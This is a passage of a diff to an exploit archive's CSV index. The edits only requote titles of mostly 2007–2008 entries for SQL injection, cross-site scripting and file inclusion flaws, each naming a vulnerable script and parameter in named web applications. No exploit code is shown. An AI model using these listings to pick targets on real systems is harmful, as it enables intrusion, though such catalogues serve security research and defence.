Inclusion",2007-10-22,hack2prison,php,webapps,0 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 @@ -32058,11 +32059,11 @@ id,file,description,date,author,platform,type,port 30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion",2007-10-24,Alucar,php,webapps,0 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - Page.asp SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 30712,platforms/php/webapps/30712.txt,"Multi-Forums - 'Directory.php' Multiple SQL Injections",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 -30715,platforms/php/webapps/30715.txt,"WordPress 2.3 - Edit-Post-Rows.php Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 +30715,platforms/php/webapps/30715.txt,"WordPress 2.3 - 'Edit-Post-Rows.php' Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 30716,platforms/php/webapps/30716.txt,"Smart-Shop - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,Doz,php,webapps,0 -30717,platforms/php/webapps/30717.txt,"Omnistar Live - KB.php Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 -30718,platforms/php/webapps/30718.txt,"Saxon 5.4 - Menu.php Cross-Site Scripting",2007-10-29,netVigilance,php,webapps,0 -30719,platforms/php/webapps/30719.txt,"Saxon 5.4 - Example.php SQL Injection",2007-10-29,netVigilance,php,webapps,0 +30717,platforms/php/webapps/30717.txt,"Omnistar Live - 'KB.php' Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 +30718,platforms/php/webapps/30718.txt,"Saxon 5.4 - 'Menu.php' Cross-Site Scripting",2007-10-29,netVigilance,php,webapps,0 +30719,platforms/php/webapps/30719.txt,"Saxon 5.4 - 'Example.php' SQL Injection",2007-10-29,netVigilance,php,webapps,0 30806,platforms/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - Directory Parameter Cross-Site Scripting",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps,0 30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty - Password Parameters SQL Injection",2007-11-26,"Aria-Security Team",asp,webapps,0 30808,platforms/cgi/webapps/30808.txt,"GWExtranet 3.0 - 'Scp.dll' Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps,0 @@ -32072,21 +32073,21 @@ id,file,description,date,author,platform,type,port 30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 - 'index.php' Local File Inclusion",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 - Dialog.php Information Disclosure",2007-11-01,d3hydr8,php,webapps,0 -30733,platforms/php/webapps/30733.txt,"phpMyAdmin 2.11.1 - Server_Status.php Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps,0 -30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - admin/index.php Cross-Site Scripting",2007-11-02,"Ivan Sanchez",php,webapps,0 +30733,platforms/php/webapps/30733.txt,"phpMyAdmin 2.11.1 - 'Server_Status.php' Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps,0 +30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - 'admin/index.php' Cross-Site Scripting",2007-11-02,"Ivan Sanchez",php,webapps,0 30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 - 'index.php' Local File Inclusion",2007-11-03,joseph.giron13,php,webapps,0 30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 - 'Upload_Config.php' Remote File Inclusion",2007-11-05,"arfis project",php,webapps,0 -30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 - Articles.php SQL Injection",2007-11-05,r00t,php,webapps,0 -30739,platforms/php/webapps/30739.txt,"JLMForo System - Buscado.php Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0 +30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 - 'Articles.php' SQL Injection",2007-11-05,r00t,php,webapps,0 +30739,platforms/php/webapps/30739.txt,"JLMForo System - 'Buscado.php' Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0 30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 - 'index.php' Local File Inclusion",2007-11-05,"BorN To K!LL",php,webapps,0 30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 - igallery.asp Remote Information Disclosure",2007-11-05,hackerbinhphuoc,asp,webapps,0 30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites - Unauthorized Access / HTML Injection",2007-11-06,0x90,php,webapps,0 30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",php,webapps,0 30747,platforms/asp/webapps/30747.txt,"Rapid Classified - 'AgencyCatResult.asp' SQL Injection",2007-11-08,The-0utl4w,asp,webapps,0 -30748,platforms/php/webapps/30748.txt,"XOOPS 2.0.17.1 Mylinks Module - Brokenlink.php SQL Injection",2007-11-09,root@hanicker.it,php,webapps,0 +30748,platforms/php/webapps/30748.txt,"XOOPS 2.0.17.1 Mylinks Module - 'Brokenlink.php' SQL Injection",2007-11-09,root@hanicker.it,php,webapps,0 30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - 'modules.php' SQL Injection",2007-11-12,0x90,php,webapps,0 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0 -30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - PHP_SELF index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0 +30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - 'PHP_SELF index.php' Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0 @@ -32099,7 +32100,7 @@ id,file,description,date,author,platform,type,port 30778,platforms/asp/webapps/30778.txt,"Click&BaneX - 'Details.asp' SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0 30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple Unspecified SQL Injections",2008-01-03,The:Paradox,php,webapps,0 -30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - 'wp-admin/post.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - '/wp-admin/post.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,80 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 30811,platforms/php/webapps/30811.txt,"SimpleGallery 0.1.3 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,php,webapps,0 @@ -32107,25 +32108,25 @@ id,file,description,date,author,platform,type,port 30815,platforms/php/webapps/30815.txt,"Tilde 4.0 - Aarstal Parameter Cross-Site Scripting",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 30817,platforms/php/webapps/30817.html,"Liferay Portal 4.3.1 - Forgot-Password Cross-Site Scripting",2007-11-27,"Joshua Morin",php,webapps,0 30818,platforms/cgi/webapps/30818.txt,"ht://Dig 3.2 - Htsearch Cross-Site Scripting",2007-11-27,"Michael Skibbe",cgi,webapps,0 -30820,platforms/php/webapps/30820.txt,"p.mapper 3.2 beta3 - 'incPHP/globals.php?_SESSION[PM_INCPHP]' Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 -30821,platforms/php/webapps/30821.txt,"p.mapper 3.2 beta3 - 'plugins/export/mc_table.php?_SESSION[PM_INCPHP]' Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 +30820,platforms/php/webapps/30820.txt,"p.mapper 3.2 beta3 - '/incPHP/globals.php?_SESSION[PM_INCPHP]' Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 +30821,platforms/php/webapps/30821.txt,"p.mapper 3.2 beta3 - '/plugins/export/mc_table.php?_SESSION[PM_INCPHP]' Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 30822,platforms/php/webapps/30822.txt,"BEA AquaLogic Interaction 6.0/6.1 Plumtree Portal - Multiple Information Disclosure Vulnerabilities",2007-11-28,"Adrian Pastor",php,webapps,0 30823,platforms/php/webapps/30823.txt,"bcoos 1.0.10 - 'ratephoto.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0 30824,platforms/php/webapps/30824.txt,"bcoos 1.0.10 - 'ratelink.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0 -30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - 'ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/admin/modules/install_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/admin/modules/uninstall_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/admin/patch/index.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/ossigeno/admin/install_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - '/upload/xax/ossigeno/admin/uninstall_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - '/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - 'ratefile.php' SQL Injection",2007-11-30,Lostmon,php,webapps,0 -30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx?template' Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 +30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - '/pages/default.aspx?template' Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 30842,platforms/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple SQL Injections",2007-12-04,"Adrian Pastor",asp,webapps,0 -30843,platforms/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' rmore Parameter Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 -30844,platforms/asp/webapps/30844.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx' template Parameter Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 +30843,platforms/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx?rmore' Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 +30844,platforms/asp/webapps/30844.txt,"Absolute News Manager .NET 5.1 - '/pages/default.aspx?template' Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 - 'getpath.aspx' Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0 30846,platforms/php/webapps/30846.txt,"phpMyChat 0.14.5 - chat/deluser.php3 LIMIT Parameter Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps,0 -30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 - 'chat/users_popupL.php3' Multiple Cross-Site Scripting Vulnerabilities",2007-12-04,beenudel1986,php,webapps,0 +30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 - '/chat/users_popupL.php3' Multiple Cross-Site Scripting Vulnerabilities",2007-12-04,beenudel1986,php,webapps,0 30848,platforms/php/webapps/30848.txt,"Joomla! Component Content 1.5 RC3 - 'view' SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30849,platforms/php/webapps/30849.txt,"Joomla! Component com_search 1.5 RC3 - 'index.php' Multiple SQL Injections",2007-12-05,beenudel1986,php,webapps,0 30851,platforms/php/webapps/30851.txt,"VisualShapers EZContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,php,webapps,0 @@ -32137,11 +32138,11 @@ id,file,description,date,author,platform,type,port 30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2007-12-10,Brainhead,php,webapps,0 30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0 30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0 -30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 - 'mylinks/ratelink.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 - 'adresses/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 - 'mydownloads/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 - 'mysections/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30884,platforms/php/webapps/30884.txt,"XOOPS 2.2.5 - register.php Cross-Site Scripting",2007-11-12,"Omer Singer",php,webapps,0 +30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 - '/mylinks/ratelink.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 - '/adresses/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 - '/mydownloads/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 - '/mysections/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30884,platforms/php/webapps/30884.txt,"XOOPS 2.2.5 - 'register.php' Cross-Site Scripting",2007-11-12,"Omer Singer",php,webapps,0 30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module - SQL Injection",2007-12-13,"Sw33t h4cK3r",php,webapps,0 30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 - Windows Installations Local File Inclusion",2007-12-15,"Michael Brooks",php,webapps,0 30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 - '/tmp' Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 @@ -32163,9 +32164,9 @@ id,file,description,date,author,platform,type,port 30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum - 'dispatch.cgi' Tcl Command Injection",2007-12-20,niekt0,cgi,webapps,0 30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection",2007-12-21,root@hanicker.it,php,webapps,0 30923,platforms/php/webapps/30923.txt,"MyBlog 1.x - 'Games.php ID' Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0 -30924,platforms/php/webapps/30924.txt,"Dokeos 1.x - 'forum/viewthread.php?forum' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 -30925,platforms/php/webapps/30925.txt,"Dokeos 1.x - 'forum/viewforum.php?forum' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 -30926,platforms/php/webapps/30926.txt,"Dokeos 1.x - 'work/work.php?display_upload_form Action origin' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 +30924,platforms/php/webapps/30924.txt,"Dokeos 1.x - '/forum/viewthread.php?forum' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 +30925,platforms/php/webapps/30925.txt,"Dokeos 1.x - '/forum/viewforum.php?forum' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 +30926,platforms/php/webapps/30926.txt,"Dokeos 1.x - '/work/work.php?display_upload_form Action origin' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 30927,platforms/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion",2007-12-24,Koller,php,webapps,0 30929,platforms/php/webapps/30929.txt,"Logaholic - 'update.php?page' SQL Injection",2007-12-24,malibu.r,php,webapps,0 30930,platforms/php/webapps/30930.txt,"Logaholic - 'index.php' SQL Injection",2007-12-24,malibu.r,php,webapps,0 @@ -32173,7 +32174,7 @@ id,file,description,date,author,platform,type,port 30932,platforms/php/webapps/30932.txt,"Logaholic - 'profiles.php?newconfname' Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 - 'com_option' Cross-Site Scripting",2007-12-25,"Omer Singer",php,webapps,0 30938,platforms/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injections",2007-12-24,bypass,asp,webapps,0 -30940,platforms/asp/webapps/30940.txt,"IPortalX - 'forum/login_user.asp' Multiple Cross-Site Scripting Vulnerabilities",2007-12-27,Doz,asp,webapps,0 +30940,platforms/asp/webapps/30940.txt,"IPortalX - '/forum/login_user.asp' Multiple Cross-Site Scripting Vulnerabilities",2007-12-27,Doz,asp,webapps,0 30941,platforms/asp/webapps/30941.txt,"IPortalX - 'blogs.asp?Date' Cross-Site Scripting",2007-12-27,Doz,asp,webapps,0 30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 - 'managetimetracker.php' SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80 @@ -32197,7 +32198,7 @@ id,file,description,date,author,platform,type,port 30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - 'q' Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - 'return' Cross-Site Scripting (2)",2007-12-31,Doz,php,webapps,0 30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - 'email' Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 -30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - 'wp-admin/edit.php' backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - '/wp-admin/edit.php' backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' SQL Injection",2008-01-03,MustLive,php,webapps,0 @@ -32213,7 +32214,7 @@ id,file,description,date,author,platform,type,port 30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 - 'search.php' Multiple SQL Injections",2008-01-07,L4teral,php,webapps,0 30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 - 'admin.php' Multiple SQL Injections",2008-01-07,L4teral,php,webapps,0 31000,platforms/php/webapps/31000.txt,"SysHotel On Line System - 'index.php' Local File Inclusion",2008-01-08,p4imi0,php,webapps,0 -31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 - 'admin/index.html' Cross-Site Scripting",2008-01-08,Ekin0x,php,webapps,0 +31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 - '/admin/index.html' Cross-Site Scripting",2008-01-08,Ekin0x,php,webapps,0 31003,platforms/php/webapps/31003.txt,"Omegasoft Insel 7 - Authentication Bypass / User Enumeration",2008-01-09,MC.Iglo,php,webapps,0 31004,platforms/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/login.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp?resultsForm' Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 @@ -32273,8 +32274,8 @@ id,file,description,date,author,platform,type,port 31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31099,platforms/php/webapps/31099.txt,"Codice CMS - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31101,platforms/php/webapps/31101.txt,"HispaH YouTube Clone - 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,php,webapps,0 -31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk - 'operator/article/article_search_results.asp?txtSearch' Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0 -31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk - 'operator/article/article_attachment.asp?Attach_Id' Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0 +31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk - '/operator/article/article_search_results.asp?txtSearch' Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0 +31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk - '/operator/article/article_attachment.asp?Attach_Id' Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0 31107,platforms/php/webapps/31107.txt,"Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31108,platforms/php/webapps/31108.txt,"Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31109,platforms/php/webapps/31109.txt,"Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 @@ -32290,7 +32291,7 @@ id,file,description,date,author,platform,type,port 31125,platforms/php/webapps/31125.txt,"Joovili 2.1 - 'members_help.php' Remote File Inclusion",2008-02-08,Cr@zy_King,php,webapps,0 31126,platforms/php/webapps/31126.txt,"S9Y Serendipity Freetag-plugin 2.95 - 'style' Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps,0 31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x - Installation Information Disclosure",2008-02-08,"Brook Powers",php,webapps,0 -31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 - 'index.php' SQL Injection / Cross-Site Scripting",2008-02-09,Houssamix,php,webapps,0 +31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 - '/index.php' SQL Injection / Cross-Site Scripting",2008-02-09,Houssamix,php,webapps,0 31134,platforms/php/webapps/31134.txt,"VWar 1.5 - 'calendar.php' SQL Injection",2008-02-11,Pouya_Server,php,webapps,0 31135,platforms/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component - Multiple SQL Injections",2008-02-11,breaker_unit,php,webapps,0 31137,platforms/php/webapps/31137.txt,"Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' SQL Injection",2008-02-11,CheebaHawk215,php,webapps,0 @@ -32309,7 +32310,7 @@ id,file,description,date,author,platform,type,port 31158,platforms/php/webapps/31158.txt,"Cacti 0.8.7 - 'graph_view.php?filter' Cross-Site Scripting",2008-02-12,aScii,php,webapps,0 31159,platforms/php/webapps/31159.txt,"Cacti 0.8.7 - 'tree.php' Multiple SQL Injections",2008-02-12,aScii,php,webapps,0 31160,platforms/php/webapps/31160.txt,"Cacti 0.8.7 - 'graph_xport.php?local_graph_id' SQL Injection",2008-02-12,aScii,php,webapps,0 -31161,platforms/php/webapps/31161.txt,"Cacti 0.8.7 - 'index.php/sql.php?Login Action login_username' SQL Injection",2008-02-12,aScii,php,webapps,0 +31161,platforms/php/webapps/31161.txt,"Cacti 0.8.7 - '/index.php/sql.php?Login Action login_username' SQL Injection",2008-02-12,aScii,php,webapps,0 31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component - SQL Injection",2008-02-12,S@BUN,php,webapps,0 31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' SQL Injection",2008-02-12,S@BUN,php,webapps,0 31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0 @@ -32325,9 +32326,9 @@ id,file,description,date,author,platform,type,port 31272,platforms/php/webapps/31272.txt,"Joomla! / Mambo Component com_Joomlavvz - 'id' SQL Injection",2008-02-20,S@BUN,php,webapps,0 31273,platforms/php/webapps/31273.txt,"Joomla! / Mambo Component com_most - 'secid' SQL Injection",2008-02-21,S@BUN,php,webapps,0 31274,platforms/php/webapps/31274.txt,"Joomla! / Mambo Component com_asortyment - 'katid' SQL Injection",2008-02-21,S@BUN,php,webapps,0 -31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 - 'spyce/examples/formtag.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",php,webapps,0 +31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 - '/spyce/examples/formtag.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",php,webapps,0 31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 - spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0 -31265,platforms/php/webapps/31265.txt,"Spyce 2.1.3 - 'docs/examples/redirect.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",php,webapps,0 +31265,platforms/php/webapps/31265.txt,"Spyce 2.1.3 - '/docs/examples/redirect.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",php,webapps,0 31266,platforms/php/webapps/31266.txt,"Spyce 2.1.3 - docs/examples/handlervalidate.spy x Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 - spyce/examples/request.spy name Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 - spyce/examples/getpost.spy Name Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 @@ -32337,11 +32338,11 @@ id,file,description,date,author,platform,type,port 31193,platforms/php/webapps/31193.txt,"Joomla! / Mambo Component com_omnirealestate - 'objid' SQL Injection",2008-02-13,S@BUN,php,webapps,0 31194,platforms/php/webapps/31194.txt,"Dokeos 1.8.4 - 'whoisonline.php?id' SQL 